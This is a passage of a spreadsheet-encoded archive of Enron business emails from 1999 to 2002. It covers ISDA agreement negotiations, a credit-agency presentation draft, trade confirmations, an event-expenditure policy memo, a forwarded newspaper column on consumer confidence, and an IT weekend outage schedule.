 it could buy to stave off ?summer blackouts, cool weather and decreased de=_x000D_
mand have left the state ?holding more power than it needs and selling the =_x000D_
surplus for whatever it can ?get. ?State officials won't say how much they =_x000D_
are selling the power for, but ?acknowledged un</t>
  </si>
  <si>
    <t>Tue, 12 Feb 2002 07:06:27 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.ratner@enron.com'})</t>
  </si>
  <si>
    <t>FW: TW Presentation.</t>
  </si>
  <si>
    <t xml:space="preserve">Michael,_x000D_
	I prepared the TW Marketing slides.  I have been incorporating Kim and Steve's comments.  You can work with me on any questions you have or any additional information you may need from Marketing._x000D_
	I follow-up on your notes in red._x000D_
_x000D_
Thx,_x000D_
Lindy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Monday, February 11, 2002 5:32 PM_x000D_
To:	Donoho, Lindy_x000D_
Cc:	Harris, Steven_x000D_
Subject:	FW: TW Presentation._x000D_
_x000D_
Lindy, _x000D_
_x000D_
Michael sent me this draft today, but I think that you should review these slides since I know that you have been working on this.  Let's discuss in the morning.  Tuesday is my last day before I leave on vacation._x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ratner, Michael  _x000D_
Sent:	Monday, February 11, 2002 4:51 PM_x000D_
To:	Watson, Kimberly; Zahn, Gary; Saunders, James_x000D_
Cc:	Howard, Kevin A._x000D_
Subject:	TW Presentation._x000D_
_x000D_
Attached is a draft presentation for credit agencies regarding TW.  Please take a look at it and provide me with your comments.  In particular, I have designated some pages that I think you can help me with, see below.  Please feel free to comment on the rest of the presentation too._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Michael_x000D_
_x000D_
Jim Saunders and Gary Zahn - 26_x000D_
_x000D_
Kim Watson - 6, 17, 19, 24_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 01:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Happy Hour</t>
  </si>
  <si>
    <t>Susan,_x000D_
_x000D_
I'm trying to schedule a time and place for our farewell Happy Hour.  Let me _x000D_
know if this works for you.  _x000D_
_x000D_
http://www.qixo.com/Details.html?uRsltID=LF00_x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Sun, 5 Nov 2000 08:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ACCESS Trades 11/03/00</t>
  </si>
  <si>
    <t xml:space="preserve">Errol:_x000D_
I did not write up these access trades from Friday.  Please make sure they _x000D_
are in._x000D_
John_x000D_
---------------------- Forwarded by John Arnold/HOU/ECT on 11/05/2000 04:42 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Mancino, Joseph (NY Int)" &lt;JMANCINO@edfman.com&gt; on 11/03/2000 08:26:02 AM_x000D_
To: "'jarnold@enron.com'" &lt;jarnold@enron.com&gt;_x000D_
cc:  _x000D_
Subject: ACCESS Trades 11/03/00_x000D_
_x000D_
_x000D_
Greg asked me send you the ACCESS trades you did last night/this morning._x000D_
_x000D_
B     37     Z       4720_x000D_
B     13     Z       4810_x000D_
B      5      Z       4815_x000D_
S     20     H       4436_x000D_
_x000D_
Thank you._x000D_
_x000D_
Joseph Mancino_x000D_
E.D. &amp; F. Man International_x000D_
(212)566-9700_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Mar 2000 08:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Calpine Operating Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">See my changes on the attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeffery Fawcett_x000D_
03/02/2000 12:45 PM_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Calpine Operating Agreement_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 16:42:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting and Event Expenditure</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The approval process initiated in 1998 for all meeting and event expenditures in excess of $5,000 has enabled Enron Americas to better assess the business value of events, accurately track our activities and save money.  These events include customer and employee meetings, and trade shows.  _x000D_
_x000D_
EA has made some modifications to the process, which are described in this memo._x000D_
_x000D_
The $5,000 threshold remains in effect for all customer events.  However, the threshold for approval for employee meetings and events has been lowered to $500, and some additional requirements must be met prior to approval._x000D_
_x000D_
Please be sure to follow the procedures described below for all meetings and events, so we can continue to successfully manage these events._x000D_
_x000D_
1) Prior to making any commitments to customers or vendors, all customer events with anticipated costs in excess of $5,000, and all employee events with anticipated costs in excess of $500 must be reviewed by the Enron Americas Public Relations department and approved by the Enron Americas Office of the Chairman_x000D_
2) The PR department will handle the site search and hotel contract negotiations for all such events.  Once this is completed, the PR department will work with you to plan and produce your event in its entirety; or they can provide as much or as little assistance as you require. The PR department will be responsible for helping you achieve the best value for your program and EA._x000D_
3) A completed expenditure request form (see attached) and supporting documentation is required for each event.  Employee meetings require a detailed agenda as part of the event documentation prior to approval.  Please submit the completed expenditure request form and documentation to the PR department at EB 3642, or work with PR department employees to complete the form._x000D_
4) After PR review, the expenditure will be submitted to the EA Office of the Chairman for final approval._x000D_
_x000D_
Additionally, the PR department can assist in the procurement of tickets for various local sporting events and concerts._x000D_
_x000D_
If you have any questions regarding this process, would like assistance planning an event, or need tickets for a Houston event, please contact Dorie Hitchcock in the PR department at (713) 853-6978._x000D_
_x000D_
Thank you for your cooperation._x000D_
_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 11:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'remi.collonges@enron.com'})</t>
  </si>
  <si>
    <t>information you requested last week</t>
  </si>
  <si>
    <t xml:space="preserve">Hi John,_x000D_
_x000D_
Was great to see you last week._x000D_
_x000D_
Attached is the market info and maps that you wanted._x000D_
_x000D_
I'll send you the list of goals and objectives for 2001 next week._x000D_
_x000D_
Have a great WE,_x000D_
_x000D_
Remi_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 07:11:27 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'terry.kowalke@enron.com', 'darrell.schoolcraft@enron.com', 'tk.lohman@enron.com', 'jeanette.doll@enron.com'})</t>
  </si>
  <si>
    <t>RE: Transwestern FERC California Monthly Report - Dec 2001_x000D_
 (Preliminary)</t>
  </si>
  <si>
    <t xml:space="preserve">I have not received any responses regarding the email below.  Please let me know ASAP if any updates need to be made before I forward the final version on to the full distribution list._x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brown, Elizabeth  _x000D_
Sent:	Friday, January 11, 2002 12:57 PM_x000D_
To:	Doll, Jeanette; Lohman, TK; Kowalke, Terry; Schoolcraft, Darrell_x000D_
Cc:	Blair, Lynn; January, Steve; Dietz, Rick; Lokey, Teb; Donoho, Lindy_x000D_
Subject:	Transwestern FERC California Monthly Report - Dec 2001 (Preliminary)_x000D_
Importance:	High_x000D_
_x000D_
Attached is the preliminary CA monthly report for December for your review.  Please verify the following:_x000D_
_x000D_
TK - The rates under Item 1 (especially those highlighted in pink, which I updated manually by reviewing invoices/transactional reports)_x000D_
Darrell - The operational capacity and footnotes under Item 3_x000D_
Terry - The scheduled and/or nominated volumes under Item 1 and 3 (I've done some cross-validations checks but another pair of eyes will help)_x000D_
Jeanette - Overall data and format for accuracy_x000D_
_x000D_
Please provide any comments to me no later than COB Monday, 1/21/02, for updates.  Once finalized, I will email to the full distribution list._x000D_
_x000D_
 &lt;&lt; File: FERC docket RM01-9_Dec2001.xls &gt;&gt; _x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Jun 2000 02:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EOL / Credit / GCP Responses 6/16/00</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 06/19/2000 09:01 AM -----_x000D_
_x000D_
	Tom Moran_x000D_
	06/16/2000 05:50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Linda S Bryan/HOU/ECT@ECT, Connie Sutton/HOU/ECT@ECT, Sylvia A _x000D_
Campos/HOU/ECT@ECT, Molly Harris/HOU/ECT@ECT, Cynthia Clark/Corp/Enron@ENRON, _x000D_
Mary G Gosnell/HOU/ECT@ECT, Enron Europe Global Contracts and Facilities, _x000D_
Enron Europe Global CounterParty, Stephanie Sever/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL / Credit / GCP Responses 6/16/00_x000D_
_x000D_
_x000D_
There are no Credit's EOL responses for 6/16/00._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
tm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Thu, 15 Nov 2001 10:17:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jhartley@g7group-ny.com'})</t>
  </si>
  <si>
    <t>frozenset({'g7dbreaders@g7group-ny.com'})</t>
  </si>
  <si>
    <t>"Alan Greenspan's outfit is troubled by a research report dated_x000D_
 Oct.  18</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
To all G7 clients,_x000D_
_x000D_
We are pleased to see that SOMEONE is reading our survey...hope you are too._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Jane Hartley_x000D_
CEO_x000D_
G7 Group, Inc._x000D_
_x000D_
_x000D_
CONSUMERS TOO AFRAID TO SPEND_x000D_
_x000D_
By JOHN CRUDELE_x000D_
----------------------------------------------------------------------------_x000D_
------_x000D_
_x000D_
November 13, 2001 -- CONSUMERS are talking tough and optimistic, but acting_x000D_
weak and glum._x000D_
_x000D_
That's the big problem in the American economy right now. And things like_x000D_
yesterday's plane crash - whether caused by terrorism or not - are likely to_x000D_
aggravate that situation._x000D_
_x000D_
The dual personality being exhibited by Americans is bothering the Federal_x000D_
Reserve, whose interest-rate cuts won't be nearly as effective if consumers_x000D_
are too scared to borrow money. I spoke with a source of mine who is_x000D_
familiar with the Fed's thinking and he tells me that monetary authorities_x000D_
are concerned, as well as perplexed, by consumers' unwillingness to part_x000D_
with a dollar even as they are feigning confidence._x000D_
_x000D_
In particular, Alan Greenspan's outfit is troubled by a research report_x000D_
dated Oct. 18 that was conducted by an independent Washington outfit called_x000D_
G7 Group. The group had the Princeton Survey Research Associates interview_x000D_
1,045 adults between Oct. 8 and 10._x000D_
_x000D_
This poll was given to me by someone close to the Fed._x000D_
_x000D_
The survey found that post-Sept. 11, Americans were putting on a good front._x000D_
_x000D_
For instance, 66 percent of the people polled said that now is a "good time"_x000D_
to purchase a car or a house, but 63 percent said they "did not feel like"_x000D_
making a major purchase._x000D_
_x000D_
Only 41 percent of the respondents felt like shopping for clothes and 75_x000D_
percent felt comfortable buying only necessities like groceries._x000D_
_x000D_
Consumer confidence has been dropping since before the Sept. 11 terrorist_x000D_
attacks. But the current level of confidence could be greatly overstated_x000D_
because it measures what people are saying and not what they are doing._x000D_
_x000D_
And the Princeton Survey shows that consumers are talking a good game but_x000D_
buckling when it comes to taking an economic turn at the plate._x000D_
_x000D_
Not surprisingly, job security is the chief concern, although Americans_x000D_
refuse to admit it. Even though the U.S. lost 415,000 jobs last month and_x000D_
our unemployment rate jumped sharply to 5.4 percent, more than 70 percent of_x000D_
those surveyed said they felt the same or more optimistic than they did a_x000D_
few months ago._x000D_
_x000D_
The Fed cut interest rates for the tenth time last week. Another rate cut is_x000D_
expected in December. The Fed made an even bolder move two weeks ago when it_x000D_
announced that it was going to stop selling 30-year government bonds._x000D_
_x000D_
The result was that interest rates on long bonds came down sharply, putting_x000D_
them more in proportion with recent rate reductions. As I've said in_x000D_
previous columns, the long bond has been a nuisance for the Central Bank_x000D_
because it hasn't declined as much as expected. This has caused things like_x000D_
mortgage rates to remain higher than they could have been._x000D_
_x000D_
The G7/Princeton survey explains to the Fed why its interest rate strategy_x000D_
hasn't been working. But it doesn't necessarily explain why - as the_x000D_
surveyors concluded - "the Sept. 11 attacks opened a chasm between what_x000D_
Americans are thinking rationally about the economy and what Americans are_x000D_
feeling as they now confront economic decisions."_x000D_
_x000D_
What will yesterday's incident do to confidence?_x000D_
_x000D_
That's anyone's guess. But unless the government quickly explains what_x000D_
happened to the public - and that's unlikely in a crash investigation like_x000D_
this - then Americans are likely to keep up their tough facade while being_x000D_
weak in the knees._x000D_
_x000D_
Over the last decade America's mood has depended a lot on how Wall Street_x000D_
was feeling. The stock market dipped sharply right after yesterday's plane_x000D_
crash, but snapped back._x000D_
_x000D_
The Federal Reserve figures, I'm told, that if interest rates stay down and_x000D_
the stock market remains stable, then Americans will eventually regain their_x000D_
confidence._x000D_
_x000D_
Let's hope so. But if you are investing in a stock market that is this_x000D_
overpriced, you should understand that the risks are great. And they are_x000D_
getting greater._x000D_
_x000D_
-John Crudele, NY Post, November 13,2001_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 03:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: VEPCO/FYI</t>
  </si>
  <si>
    <t>Well, what can I say.  It represents job security for all of us!</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2001 06:54:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Draft ISDA Master Agreement between Enron Corporation and Fir_x000D_
	st Union National Bank</t>
  </si>
  <si>
    <t>_x000D_
Susan:_x000D_
_x000D_
Sara received this e-mail from First Union regarding the ISDA with Enron Corp.  Per Lotus Notes, you are working with Sara on this.  Is this something you can handle, or should it wait until Sara returns?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie_x000D_
 -----Original Message-----_x000D_
From: 	Rozycki, Joanne  _x000D_
Sent:	Thursday, August 23, 2001 8:21 AM_x000D_
To:	Heard, Marie_x000D_
Subject:	FW: Draft ISDA Master Agreement between Enron Corporation and Fir	st Union National Bank_x000D_
_x000D_
Marie, this looks like a response is necessary._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Suchdev, Vijay" &lt;Vijay.Suchdev@funb.com&gt;@ENRON [mailto:IMCEANOTES-+22Suchdev+2C+20Vijay+22+20+3CVijay+2ESuchdev+40funb+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, August 22, 2001 1:55 PM_x000D_
To:	Shackleton, Sara_x000D_
Subject:	RE: Draft ISDA Master Agreement between Enron Corporation and Fir	st Union National Bank_x000D_
_x000D_
First Union Securities, Inc._x000D_
_x000D_
Sara,_x000D_
_x000D_
Yes.  I explained your view on the CSA to our Credit department.  They're_x000D_
still eager to put a bilateral CSA in place.  We believe it is mutually_x000D_
beneficial as the credit lines would not be exhausted too soon if we could_x000D_
set up a mark-to-market collateral arrangement between the parties._x000D_
_x000D_
Could you please reconsider.  Have you considered the removal of the_x000D_
arbitration provision?_x000D_
_x000D_
Vijay_x000D_
_x000D_
	-----Original Message-----_x000D_
	From:	Sara.Shackleton@enron.com [SMTP:Sara.Shackleton@enron.com]_x000D_
	Sent:	Wednesday, August 22, 2001 2:42 PM_x000D_
	To:	Vijay.Suchdev@funb.com_x000D_
	Subject:	RE: Draft ISDA Master Agreement between Enron_x000D_
Corporation and First U	nion National Bank_x000D_
_x000D_
	You were going to check with your credit group.  Do you have a_x000D_
response_x000D_
	(re: CSA)?  Sara_x000D_
_x000D_
	    -----Original Message-----_x000D_
	   From:   "Suchdev, Vijay" &lt;Vijay.Suchdev@funb.com&gt;@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-+22Suchdev+2C+20Vijay+22+20+3CVijay+2ESuchdev+40funb+2Eco_x000D_
m+3E+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
	   Sent:   Wednesday, August 22, 2001 1:34 PM_x000D_
	   To:     Shackleton, Sara_x000D_
	   Subject:  Draft ISDA Master Agreement between Enron Corporation_x000D_
and_x000D_
	             First U      nion National Bank_x000D_
_x000D_
	   First Union Securities, Inc._x000D_
_x000D_
	   Hi Sara,_x000D_
_x000D_
	   I just wanted to follow up on our discussion of the draft ISDA_x000D_
last_x000D_
	   week._x000D_
	   When you're back in the office and you have a moment, could you_x000D_
please_x000D_
	   give_x000D_
	   me a call._x000D_
_x000D_
	   Thanks and regards,_x000D_
_x000D_
	   Vijay K. Suchdev_x000D_
	   Vice President_x000D_
	   Equity Derivatives_x000D_
	   First Union Securities, Inc._x000D_
	   Telephone: (212) 909-0951_x000D_
	   Facsimile: (212) 891-5042_x000D_
	   email: vijay.suchdev@funb.com &lt;mailto:vijay.suchdev@funb.com&gt;_x000D_
_x000D_
_x000D_
	   This is for your information only and is not an offer to sell, or_x000D_
a_x000D_
	   solicitation of an offer to buy, the securities or instruments_x000D_
	   mentioned.  The information has been obtained or derived from_x000D_
sources_x000D_
	   believed by us to be reliable, but we do not represent that it is_x000D_
	   accurate or complete.  Any opinions or estimates contained in_x000D_
this_x000D_
	   information constitute our judgement as of this date and are_x000D_
subject to_x000D_
	   change without notice.  First Union Securities, Inc. (FUSI), or_x000D_
its_x000D_
	   affiliates may provide advice or may from time to time acquire,_x000D_
hold or_x000D_
	   sell a position in the securities mentioned herein.  FUSI is a_x000D_
	   subsidiary of First Union Corporation and is a member of the_x000D_
NYSE, NASD_x000D_
	   and SIPC.  FUSI is a separate and distinct entity from its_x000D_
affiliated_x000D_
	   banks and thrifts._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
	This e-mail is the property of Enron Corp. and/or its relevant_x000D_
affiliate and may contain confidential and privileged material for the sole_x000D_
use of the intended recipient (s). Any review, use, distribution or_x000D_
disclosure by others is strictly prohibited. If you are not the intended_x000D_
recipient (or authorized to receive for the recipient), please contact the_x000D_
sender or reply to Enron Corp. at enron.messaging.administration@enron.com_x000D_
and delete all copies of the message. This e-mail (and any attachments_x000D_
hereto) are not intended to be an offer (or an acceptance) and do not create_x000D_
or evidence a binding and enforceable contract between Enron Corp. (or any_x000D_
of its affiliates) and the intended recipient or any other party, and may_x000D_
not be relied on by anyone as the basis of a contract by estoppel or_x000D_
otherwise. Thank you._x000D_
_x000D_
**********************************************************************_x000D_
_x000D_
_x000D_
This is for your information only and is not an offer to sell, or a solicitation of an offer to buy, the securities or instruments mentioned.  The information has been obtained or derived from sources believed by us to be reliable, but we do not represent that it is accurate or complete.  Any opinions or estimates contained in this information constitute our judgement as of this date and are subject to change without notice.  First Union Securities, Inc. (FUSI), or its affiliates may provide advice or may from time to time acquire, hold or sell a position in the securities mentioned herein.  FUSI is a_x000D_
subsidiary of First Union Corporation and is a member of the NYSE, NASD and SIPC.  FUSI is a separate and distinct entity from its affiliated banks and thrifts.</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 01:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jkeffer@kslaw.com', 'ccampbell@kslaw.com'})</t>
  </si>
  <si>
    <t>Next step on Panda/Delta/Sunlaw</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I think a good next step while the counterparties are reviewing the docs is _x000D_
the creation of a closing checklist, since we have a good starting point with _x000D_
the Intergen closing list.  We can get organized on putting together a _x000D_
package of the next traunche of docs, such as the parent guaranty, escrow _x000D_
agreement, etc. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
PS.  You might want to check the docs I sent out to Jake to make sure I _x000D_
didn't put a Panda in a Delta doc.  I checked, but I need to be double _x000D_
checked.  Another good reason to use XYZ's until the finalist is selected.</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 09:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Port of Oakland</t>
  </si>
  <si>
    <t>Stewart,_x000D_
_x000D_
Sara and I need to clarify a couple of issues with Ed Sacks.  It may be _x000D_
tomorrow before we are able to send a draft ISDA Master Agreement for the _x000D_
Port of Oakland.  Regarding delivery, do you have contact information for _x000D_
them or should I send the draft to you for delivery?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Stephanie Panus_x000D_
Sr. Legal Specialist_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806_x000D_
Houston, Texas  77002_x000D_
phone:  713.345.3249_x000D_
fax:  713.646.3490</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 08:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: SITA Master Agreement</t>
  </si>
  <si>
    <t>CONFIDENTIALITY This e-mail and any attachments are confidential_x000D_
and may also be privileged. If you are not the named recipient,_x000D_
please notify the sender immediately and do not disclose the_x000D_
contents to another person, use it for any purpose, or store_x000D_
or copy the information in any medium._x000D_
----------------------------------------------------------------_x000D_
_x000D_
 _x000D_
Sara_x000D_
Thanks for your email.? As regards your  points:_x000D_
?_x000D_
(1) I will let you know once the guarantee is  finalised._x000D_
?_x000D_
(2)?I look forward to receiving the power.?  My client told me this morning _x000D_
that he has an email from one of your commercial  people saying that EEFT _x000D_
will be the counterparty and that ECTRIC is no longer  involved. I had _x000D_
thought that EEFT were simply signing on behalf of ECTRIC and  the fact that _x000D_
you are sending me a power suggests to me that this is still the  case.? _x000D_
However, given your commercial colleague's email to my client there  is still _x000D_
confusion regarding the identity of the counterparty which I would be  _x000D_
grateful if you could clarify. _x000D_
?_x000D_
(3) Thank you._x000D_
?_x000D_
(4) Sita has had executed the certificate (which refers to two boardr _x000D_
esolutions) and a power of attorney.? I look forward to hearing from you  _x000D_
regarding the Tax rep._x000D_
?_x000D_
Have a nice break_x000D_
Susan_x000D_
?_x000D_
&gt;&gt;&gt; &lt;Sara.Shackleton@enron.com&gt; 12/6/2000 16:42:00  &gt;&gt;&gt;_x000D_
Susan:_x000D_
_x000D_
A few items to follow up with:_x000D_
_x000D_
(1)? I  understand that you are finalizing the Enron Corp. guaranty with_x000D_
ClementA brams.? Please let me know when all is agreed and I will arrange_x000D_
with  Clem for an executed guaranty._x000D_
_x000D_
(2)? Stephanie Panus will fax to you  the power of attorney for EEFT to act_x000D_
for ECTRIC.? The acronyms will be  obvious in the fax._x000D_
_x000D_
(3)? Euros are fine for Termination and  Contractual Currency._x000D_
_x000D_
(4)? I am considering your proposed  certificate in lieu of a board_x000D_
resolution and checking your tax rep._x000D_
_x000D_
I  will be out of the office Dec. 7 &amp; 8.? You can contact Stephanie Panus  in_x000D_
my absence._x000D_
_x000D_
Regards.? Sara_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------------------------------------_x000D_
Lovells (the merged firm of Lovell White Durrant and _x000D_
Boesebeck Droste, practising as Lovells Boesebeck Droste in_x000D_
some jurisdictions) is an international law firm._x000D_
_x000D_
In the event of any technical difficulty with this email, please contact_x000D_
the sender or the London Technology Department on +44 (0) 20 7296 2000.</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 06:36:50 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/9/02; HourAhead hour: 9;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/9/02; HourAhead hour: 9;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010909.txt</t>
  </si>
  <si>
    <t>Mon, 5 Apr 1999 08:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'russ.ulibarri@enron.com'})</t>
  </si>
  <si>
    <t>Topock Filter Separators</t>
  </si>
  <si>
    <t>There are two different sizes of filters at Topock_x000D_
_x000D_
1.  At PG&amp;E there is one 54 inch ID X 17'-6" Horizontal filter separator.  _x000D_
This separator has 74 elements to it.  They are 4 1/2" OD by 72" long._x000D_
_x000D_
2.  At the Selexol plant there are two 48" IDX17"-6" Horizontal filter _x000D_
separators.  These separators have 52 elements to each.  They are the same _x000D_
size filter as above._x000D_
_x000D_
I will be sending a copy of the purchase orders these have all the _x000D_
dimensions.  One of these sheet show that the filter elements are 76" long _x000D_
this is incorrect.  They are 72" long._x000D_
_x000D_
We will talk to you later.  We will be on our way to Kingman in the morning.</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 02:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: Have you done the Palm Beach Pokey yet?</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 11/27/2000 _x000D_
10:12 AM ---------------------------_x000D_
_x000D_
_x000D_
"Clark Mayers" &lt;jcmayers@earthlink.net&gt; on 11/27/2000 10:03:15 AM_x000D_
Please respond to "Clark Mayers" &lt;jcmayers@earthlink.net&gt;_x000D_
To: "Sean Mayers" &lt;smmayers@earthlink.net&gt;, "Mike/Christine Richter" _x000D_
&lt;crich75206@aol.com&gt;, "Mary Fate" &lt;maryfate@planetkc.com&gt;, "Kim _x000D_
Mayers/Sprint" &lt;Kim.Mayers@mail.sprint.com&gt;, "Frank Frederic" _x000D_
&lt;fpfred@juno.com&gt;, "Darron Giron" &lt;Darron.C.Giron@enron.com&gt;, "Darnell Moore" _x000D_
&lt;darnellmo@aol.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: Have you done the Palm Beach Pokey yet?_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
?_x000D_
?_x000D_
http://www.dovewinds.com/dubya/alshokeypokey.html  _x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 13:08:53 -0800 (PST)</t>
  </si>
  <si>
    <t>Weekend Outage Report for 11-21-01 through 11-25-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
November 21, 2001 5:00pm through November 26,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ES: _x000D_
Impact:  EES_x000D_
Time:  Sat 11/24/2001 at  10:30:00 PM CT thru Sun 11/25/2001 at  6:30:00 AM CT_x000D_
	Sat 11/24/2001 at    8:30:00 PM PT thru Sun 11/25/2001 at  4:30:00 AM PT_x000D_
	Sun 11/25/2001 at  4:30:00 AM London thru Sun 11/25/2001 at  12:30:00 PM London_x000D_
Outage:  EESHOU-FS2 "R" drive migration outage_x000D_
Environments Impacted:  EES_x000D_
Purpose: migration of "R" drive to larger disk space_x000D_
Backout: restore from backup_x000D_
Contact(s): 	Mark Jordan             713-562-4247  _x000D_
		Roderic H Gerlach  713-345-3077  _x000D_
		Jeff Hughes              713-345-8809_x000D_
		Tom Novark              713-345-4962_x000D_
 _x000D_
ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:  No Scheduled Outages._x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
MESSAGING: _x000D_
Impact:  nahou-msmbx01p and 02p_x000D_
Time:  Wed 11/21/2001 at  7:00:00 PM CT  thru Wed 11/21/2001 at  7:30:00 PM CT_x000D_
	Wed 11/21/2001 at  5:00:00 PM PT thru Wed 11/21/2001 at  5:30:00 PM PT_x000D_
	Thur 11/22/2001 at  1:00:00 AM London thru Thur 11/22/2001 at  1:30:00 AM_x000D_
Outage:  nahou-msdog01v_x000D_
Environments Impacted:  Messaging Team_x000D_
Purpose: Need to make sure the hotfix works on a production box._x000D_
Backout: remove EXifs.sys and replace with the previous version._x000D_
Contact(s): 	David Lin    713-345-1619_x000D_
 _x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER: _x000D_
Impact:  ENPOWER Application_x000D_
Time:  Sat 11/24/2001 at  10:00:00 AM CT thru Sun 11/25/2001 at  6:00:00 PM CT_x000D_
	Sat 11/24/2001 a     8:00:00 AM PT thru Sun 11/25/2001 at  4:00:00 PM PT_x000D_
	Sat 11/24/2001 at  4:00:00 PM London thru Mon 11/26/2001 at  12:00:00 AM London_x000D_
Outage:  PWRPROD1 Maintenance_x000D_
Environments Impacted:  EnPower Users_x000D_
Purpose: Maintenance of database objects. Increase efficiency of space utilization and query performance of the EnPower system._x000D_
Backout: Revert to backed-up copies of objects (All will be backed-up prior to each re-org)_x000D_
Contact(s): 	Michael Berger  713-345-3190  281-960-5571_x000D_
		Oracle On-Call DBA  N/A  888-993-3793_x000D_
		Charles Brewer  713-345-4868  281-960-7066_x000D_
		Tantra Invedy  713-853-4304  281-960-7184_x000D_
_x000D_
Impact: Corp_x000D_
Time:   Thur 11/22/2001 at  6:00:00 AM CT thru Fri 11/23/2001 at  12:00:00 AM CT_x000D_
	Thur 11/22/2001 at  4:00:00 AM PT thru Thur 11/22/2001 at 10:00:00 PM PT_x000D_
	Thur  11/22/2001 at  12:00:00 PM London thru Fri 11/23/2001 at  6:00:00 AM London _x000D_
Outage: Test / Dev disk re layouts, server Croaker_x000D_
Environments Impacted: Custom Logs (CEI), EnPower, Equities, ERP/TRV, Estreme Relocation, Etalk, Government Affairs, Infinity, ITOPS, IZZIE, OMS (Yantra), RMS, SIEBEL, WEBMODAL, REMEDY _x000D_
Purpose: Migrate to the new more efficient disk layout with enhanced performance now that testing is complete._x000D_
Backout: Restore original disklayout. Restore data from backup storage._x000D_
Contact(s):  Dolan, Michael713-345-3251_x000D_
                   Wells, Malcolm713-345-3716_x000D_
 _x000D_
Impact: Corp_x000D_
Time:   Thur 11/22/2001 at  6:00:00 AM CT thru Fri 11/23/2001 at  12:00:00 AM CT_x000D_
	Thur 11/22/2001 at  4:00:00 AM PT thru Thur 11/22/2001 at 10:00:00 PM PT_x000D_
	Thur  11/22/2001 at  12:00:00 PM London thru Fri 11/23/2001 at  6:00:00 AM London _x000D_
